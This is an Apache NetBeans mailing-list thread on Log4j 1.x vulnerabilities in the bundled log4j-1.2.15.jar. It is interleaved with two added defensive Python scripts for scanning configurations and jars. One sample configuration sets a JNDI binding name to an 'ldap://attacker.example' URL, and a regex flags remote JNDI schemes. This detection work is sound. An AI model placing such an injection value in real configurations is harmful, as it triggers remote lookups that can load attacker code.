Posted to users@netbeans.apache.org by As...@wellsfargo.com.INVALID on 2022/01/03 21:32:46 UTC

Log4j 1.x Vulnerabilities

Can the following questions be confirmed for NetBeans?

  1.  Which versions of your products utilize Log4j 1.x, if any?

  2.  Do they utilize the JMSAppender or SocketServer classes?

  3.  Do you have any mitigation options available for addressing both CVE-2019-17571 and CVE-2021-4104?
      https://nvd.nist.gov/vuln/detail/CVE-2019-17571
      https://nvd.nist.gov/vuln/detail/CVE-2021-4104

      *   Would it impact the product if we deleted both the net/JMSAppender.class and net/SocketServer.class from the Log4j 1.x JAR itself?

  4.  Can you provide a roadmap of when you plan to move to Log4j version 2.15 or higher?

Thanks,
Ashley Dingman


Re: Log4j 1.x Vulnerabilities

Posted by Geertjan Wielenga <ge...@googlemail.com.INVALID>.
From that, one way to mitigate the issue would be to uninstall the HTML
editor.

Gj

On Tue, Jan 4, 2022 at 4:31 PM Geertjan Wielenga <
geertjan.wielenga@googlemail.com> wrote:

> Here are the relevant places in the sources:
>
>
> https://github.com/apache/netbeans/blob/master/ide/html.validation/external/binaries-list
>
>
> https://github.com/apache/netbeans/blob/master/ide/html.validation/external/log4j-1.2.15-license.txt
>
> I don't see anywhere else, i.e., it's used in the HTML editor for
> validation, looks like.
>
> Gj

Re: Log4j 1.x Vulnerabilities

Posted by Geertjan Wielenga <ge...@googlemail.com.INVALID>.
Here are the relevant places in the sources:

https://github.com/apache/netbeans/blob/master/ide/html.validation/external/binaries-list

https://github.com/apache/netbeans/blob/master/ide/html.validation/external/log4j-1.2.15-license.txt

I don't see anywhere else, i.e., it's used in the HTML editor for
validation, looks like.

Gj

On Tue, Jan 4, 2022 at 4:24 PM Geertjan Wielenga <
geertjan.wielenga@googlemail.com> wrote:

> Indeed, that's a different vulnerability and, indeed, we do need to
> upgrade to the latest release of log4j.
>
> Gj

Re: Log4j 1.x Vulnerabilities

Posted by Geertjan Wielenga <ge...@googlemail.com.INVALID>.
Indeed, that's a different vulnerability and, indeed, we do need to upgrade
to the latest release of log4j.

Gj

On Tue, Jan 4, 2022 at 4:21 PM Humphrey Clerx <hc...@gmail.com> wrote:

> Hi,
>
> The log4j2 security page also clearly states:
>
> "Please note that Log4j 1.x has reached End of Life in 2015 and is no
> longer supported. Vulnerabilities reported after August 2015 against Log4j
> 1.x were not checked and will not be fixed. Users should upgrade to Log4j 2
> to obtain security fixes."
>
> And there is a security vulnerability present in log4j 1.x, CVE-2019-17571
> <https://www.cvedetails.com/cve/CVE-2019-17571/> that might need
> addressing in NetBeans. This is stated on the following page:
>
>  - https://logging.apache.org/log4j/1.2/
>
> Greets,
>     Humphrey.

Re: Log4j 1.x Vulnerabilities

Posted by antonio <an...@vieiro.net>.
Hi all,

Quoting from the CVE details:

"to remotely execute arbitrary code when combined with a deserialization 
gadget when listening to untrusted network traffic for log data"

Apache NetBeans does not "listen to untrusted network traffic for log 
data", so it's not vulnerable.

Kind regards,
Antonio

On 4 Jan 2022 at 16:24, Humphrey Clerx wrote:
> And there is a security vulnerability present in log4j 1.x, 
> CVE-2019-17571 <https://www.cvedetails.com/cve/CVE-2019-17571/> that 
> might need addressing in NetBeans. This is stated on the following page:
> 
>   - https://logging.apache.org/log4j/1.2/
> 

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@netbeans.apache.org
For additional commands, e-mail: users-help@netbeans.apache.org

For further information about the NetBeans mailing lists, visit:
https://cwiki.apache.org/confluence/display/NETBEANS/Mailing+lists
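The two conditions this thread turns on can be checked mechanically rather than argued from memory. As an added example (not code from the NetBeans project or from any poster), the script below parses a Log4j 1.x configuration for org.apache.log4j.net.JMSAppender and its JNDI binding names (the CVE-2021-4104 path: an attacker who can write the config points TopicBindingName or TopicConnectionFactoryBindingName at a JNDI URL), and checks a list of JVM command lines for the Log4j 1.x socket-server main classes that deserialize LoggingEvents from the network (the "listening to untrusted network traffic for log data" condition of CVE-2019-17571). The configuration text and the process list are constructed for the example.

```python
"""Does a Log4j 1.x deployment exercise the code paths behind CVE-2021-4104
(JMSAppender configured) and CVE-2019-17571 (a socket server listening)?
Added example, not NetBeans project code; samples below are constructed."""
import re
import xml.etree.ElementTree as ET

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
# Parameters JMSAppender resolves through JNDI.
JNDI_PARAMS = ("TopicBindingName", "TopicConnectionFactoryBindingName")
# Main classes in log4j-1.2.x that read serialized LoggingEvents from a TCP port.
SOCKET_SERVERS = ("org.apache.log4j.net.SocketServer",
                  "org.apache.log4j.net.SimpleSocketServer")


def jms_appenders_in_properties(text):
    """{appender name: {JNDI param: value}} for every JMSAppender declared in
    a log4j.properties file (log4j.appender.NAME=class form)."""
    found = {}
    for line in text.splitlines():
        m = re.match(r"\s*log4j\.appender\.([\w.-]+)\s*=\s*(\S+)", line)
        if m and m.group(2) == JMS_APPENDER:
            found[m.group(1)] = {}
    for name, params in found.items():
        for param in JNDI_PARAMS:
            pat = rf"^\s*log4j\.appender\.{re.escape(name)}\.{param}\s*=\s*(.*)$"
            m = re.search(pat, text, re.M)
            if m:
                params[param] = m.group(1).strip()
    return found


def jms_appenders_in_xml(text):
    """Same for log4j.xml: <appender class="..."> with <param name= value=/>."""
    found = {}
    for app in ET.fromstring(text).iter("appender"):
        if app.get("class") == JMS_APPENDER:
            found[app.get("name")] = {p.get("name"): p.get("value")
                                      for p in app.findall("param")
                                      if p.get("name") in JNDI_PARAMS}
    return found


def remote_jndi_refs(params):
    """Binding names that are JNDI URLs instead of plain names: the shape a
    config-writing attacker substitutes to force an outbound lookup."""
    return {k: v for k, v in params.items()
            if re.match(r"(?i)(ldap|ldaps|rmi|dns|iiop)://", v or "")}


def socket_servers_in_cmdlines(cmdlines):
    """(main class, port) for each JVM command line launching a Log4j 1.x
    socket server; the first argument after the main class is the port."""
    hits = []
    for cmd in cmdlines:
        argv = cmd.split()
        for i, tok in enumerate(argv):
            if tok in SOCKET_SERVERS:
                hits.append((tok, argv[i + 1] if i + 1 < len(argv) else None))
    return hits


# Constructed log4j.properties with a normally configured JMSAppender.
SAMPLE_PROPERTIES = """\
log4j.rootLogger=INFO, JMS
log4j.appender.JMS=org.apache.log4j.net.JMSAppender
log4j.appender.JMS.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory
log4j.appender.JMS.ProviderURL=tcp://localhost:61616
log4j.appender.JMS.TopicBindingName=logTopic
log4j.appender.JMS.TopicConnectionFactoryBindingName=ConnectionFactory
"""

# Constructed log4j.xml after someone with write access edited the binding name.
SAMPLE_XML = """\
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="jms" class="org.apache.log4j.net.JMSAppender">
    <param name="TopicBindingName" value="ldap://attacker.example/a"/>
    <param name="TopicConnectionFactoryBindingName" value="ConnectionFactory"/>
  </appender>
  <root><level value="info"/><appender-ref ref="jms"/></root>
</log4j:configuration>
"""

SAMPLE_PS = [  # constructed `ps -o args` output
    "java -jar netbeans-launcher.jar",
    "java -cp log4j-1.2.15.jar org.apache.log4j.net.SimpleSocketServer 4560 server.properties",
]


def assess():
    """Which appenders are JMSAppender, which binding names are remote JNDI
    URLs, and which processes listen for serialized log events."""
    props = jms_appenders_in_properties(SAMPLE_PROPERTIES)
    xml = jms_appenders_in_xml(SAMPLE_XML)
    return {
        "properties": {n: remote_jndi_refs(p) for n, p in props.items()},
        "xml": {n: remote_jndi_refs(p) for n, p in xml.items()},
        "listeners": socket_servers_in_cmdlines(SAMPLE_PS),
    }


if __name__ == "__main__":
    print(assess())
```

A JMSAppender that is merely declared already satisfies the CVE-2021-4104 precondition once someone can write the configuration file, so the properties result (no remote URL yet) is a finding about file permissions, not an all-clear; the socket-server check is the one that answers Antonio's question about listening for log data from the network.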


Re: Log4j 1.x Vulnerabilities

Posted by Humphrey Clerx <hc...@gmail.com>.
Hi,

The log4j2 security page also clearly states:

"Please note that Log4j 1.x has reached End of Life in 2015 and is no
longer supported. Vulnerabilities reported after August 2015 against Log4j
1.x were not checked and will not be fixed. Users should upgrade to Log4j 2
to obtain security fixes."

And there is a security vulnerability present in log4j 1.x, CVE-2019-17571
<https://www.cvedetails.com/cve/CVE-2019-17571/> that might need addressing
in NetBeans. This is stated on the following page:

 - https://logging.apache.org/log4j/1.2/

Greets,
    Humphrey.

On Tue, Jan 4, 2022 at 2:21 PM Geertjan Wielenga
<ge...@googlemail.com.invalid> wrote:

> We've looked for "log4j" in the NetBeans 12.6 binaries, as follows:
>
> --
> nb16$ find . -type f | grep -i log4j
> ./extide/ant/lib/ant-apache-log4j.jar
> ./ide/modules/ext/log4j-1.2.15.jar
> --
>
> So, we ship "log4j-1.2.15.jar" with the binaries and, quoting the official
> source [1]:
>
> "Log4j 1.x is not impacted by this vulnerability."
>
> (where "this vulnerability" means
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832).
>
> Hope it helps,
>
> Gj
>
> [1]
> https://logging.apache.org/log4j/2.x/security.html

-- 
In the mountains of truth, you never climb in vain - Nietzsche
#-------------------------------------------------------------
 \_O
,__/>
  <"
   '

Re: Log4j 1.x Vulnerabilities

Posted by Geertjan Wielenga <ge...@googlemail.com.INVALID>.
We've looked for "log4j" in the NetBeans 12.6 binaries, as follows:

--
nb16$ find . -type f | grep -i log4j
./extide/ant/lib/ant-apache-log4j.jar
./ide/modules/ext/log4j-1.2.15.jar
--

So, we ship "log4j-1.2.15.jar" with the binaries and, quoting the official
source [1]:

"Log4j 1.x is not impacted by this vulnerability."

(where "this vulnerability" means
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832).

Hope it helps,

Gj

[1]
https://logging.apache.org/log4j/2.x/security.html

On Mon, Jan 3, 2022 at 10:33 PM <As...@wellsfargo.com.invalid>
wrote:

> Can the following questions be confirmed for NetBeans?
>
>    1. Which versions of your products utilize Log4j 1.x, if any?
>
>    2. Do they utilize the JMSAppender or SocketServer classes?
>
>    3. Do you have any mitigation options available for addressing both
>    CVE-2019-17571 and CVE-2021-4104?
>
> https://nvd.nist.gov/vuln/detail/CVE-2019-17571
>
> https://nvd.nist.gov/vuln/detail/CVE-2021-4104
>
>       * Would it impact the product if we deleted both the
>       net/JMSAppender.class and net/SocketServer.class from the Log4j 1.x JAR
>       itself?
>
>    4. Can you provide a roadmap of when you plan to move to Log4j version
>    2.15 or higher?
>
>
>
> Thanks,
>
> Ashley Dingman
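The find | grep above goes by file name. As an added example (not NetBeans project code), the script below walks an install tree, recognises Log4j 1.x jars by their contents, reports whether each carries the two classes named in the original question, and writes a copy with those entries removed so the effect of deleting them can be tried on a scratch install before the real one is touched. The install tree built by make_sample_tree() is constructed for the demo; its jar paths mirror the two the message lists, but the entries placed inside them are assumed, not read from the real files.

```python
"""Inventory Log4j 1.x jars under an install tree and check them for the two
classes behind CVE-2019-17571 (SocketServer) and CVE-2021-4104 (JMSAppender).

Added example, not NetBeans project code. The install tree built by
make_sample_tree() is constructed for the demo.
"""
import os
import shutil
import tempfile
import zipfile

# Full entry names inside the jar; the e-mail's "net/JMSAppender.class" is
# shorthand for these.
RISKY_CLASSES = {
    "org/apache/log4j/net/SocketServer.class": "CVE-2019-17571",
    "org/apache/log4j/net/JMSAppender.class": "CVE-2021-4104",
}
# Present in every Log4j 1.2 jar; identifies Log4j 1.x by content, not name.
LOG4J1_MARKER = "org/apache/log4j/Logger.class"
CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # placeholder class-file bytes for the demo


def find_jars(root):
    """Yield every .jar under root (a name-based `find | grep -i log4j`
    misses a shaded or renamed copy)."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jar"):
                yield os.path.join(dirpath, name)


def inspect_jar(path):
    """Return (is_log4j1, {risky entry: CVE}) for one jar."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
    found = {n: cve for n, cve in RISKY_CLASSES.items() if n in names}
    return LOG4J1_MARKER in names, found


def strip_classes(src, dst):
    """Write dst as a copy of src without the risky entries (the Log4j 1.x
    analogue of deleting JndiLookup.class from a Log4j 2 jar). Returns the
    entry names removed."""
    removed = []
    with zipfile.ZipFile(src) as zin, \
         zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            if item.filename in RISKY_CLASSES:
                removed.append(item.filename)
                continue
            zout.writestr(item, zin.read(item.filename))
    return removed


def scan(root):
    """Map jar path -> {risky entry: CVE} for every Log4j 1.x jar under root."""
    report = {}
    for jar in sorted(find_jars(root)):
        is_log4j1, found = inspect_jar(jar)
        if is_log4j1:
            report[jar] = found
    return report


def make_sample_tree():
    """Constructed stand-in for an install with the two jar paths the thread
    lists. The entries inside both jars are assumed for the demo."""
    root = tempfile.mkdtemp()
    ext = os.path.join(root, "ide", "modules", "ext")
    os.makedirs(ext)
    with zipfile.ZipFile(os.path.join(ext, "log4j-1.2.15.jar"), "w") as zf:
        for entry in [LOG4J1_MARKER, *RISKY_CLASSES]:
            zf.writestr(entry, CLASS_MAGIC)
    antlib = os.path.join(root, "extide", "ant", "lib")
    os.makedirs(antlib)
    with zipfile.ZipFile(os.path.join(antlib, "ant-apache-log4j.jar"), "w") as zf:
        zf.writestr("org/apache/tools/ant/listener/Log4jListener.class", CLASS_MAGIC)
    return root


def demo():
    """Scan the sample tree, strip each Log4j 1.x jar, re-inspect the copy.
    Returns {relative jar path: (CVEs found, entries removed, risky entries
    left in the stripped copy)}."""
    root = make_sample_tree()
    try:
        results = {}
        for jar, found in scan(root).items():
            stripped = jar + ".stripped"
            removed = strip_classes(jar, stripped)
            _, after = inspect_jar(stripped)
            rel = os.path.relpath(jar, root).replace(os.sep, "/")
            results[rel] = (sorted(found.values()), sorted(removed), after)
        return results
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for jar, (cves, removed, left) in demo().items():
        print(jar, cves, "removed:", removed, "left:", left)
```

Deleting the two classes removes the vulnerable code, but anything that still references them (a configuration naming JMSAppender, or a launcher for SocketServer) will then fail at runtime with NoClassDefFoundError, so run the stripped copy through the application's own startup and the feature that pulls in log4j (here, HTML validation) before rolling it out; and since Log4j 1.x is end of life, treat this as a stopgap until the dependency is replaced.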